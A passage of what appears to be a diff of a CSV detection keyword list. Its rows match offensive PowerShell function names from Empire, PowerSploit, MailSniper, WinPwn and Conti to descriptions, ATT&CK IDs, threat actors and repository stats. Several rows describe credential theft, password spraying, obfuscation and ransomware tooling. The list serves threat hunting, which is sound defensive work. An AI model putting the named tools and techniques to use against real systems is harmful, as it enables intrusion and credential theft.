T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1069","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-NetworkAdaptersCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-NetworkRelay*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*Invoke-Nightmare -DLL *","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-Nightmare -NewUser*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-Nightmare*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-NinjaCopy*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-NinjaCopy*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-NinjaCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Nightmare*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-NinjaCopy*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-NinjaCopy*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-NinjaCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-noPac.*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/Invoke-noPac","1","0","N/A","N/A","1","57","12","2023-02-16T10:45:19Z","2021-12-13T19:01:18Z" "*Invoke-NTLMAuth.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*Invoke-Ntsd.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1148","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Obfuscation*","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059 - T1140","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","1","N/A","N/A","10","3289","733","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z" -"*Invoke-OpenInboxFinder*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-OpenOWAMailboxInBrowser*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" -"*Invoke-OxidResolver*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Oxidresolver*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-OxidResolver*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-P0wnedshell*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-P0wnedshellx86*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-PacketKnock*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Paranoia*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Paranoia.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Paranoia*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1146","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PasswordSpray*","offensive_tool_keyword","MailSniper","Invoke-PasswordSpray* will attempt to connect to an * portal and perform a password spraying attack using a userlist and a single password.","T1114 T1550 T1555 T1212 T1558 T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-PasswordSprayEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-PasswordSprayEWS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-PasswordSprayGmail*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-PasswordSprayOWA*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PSInject.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Ntsd.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - 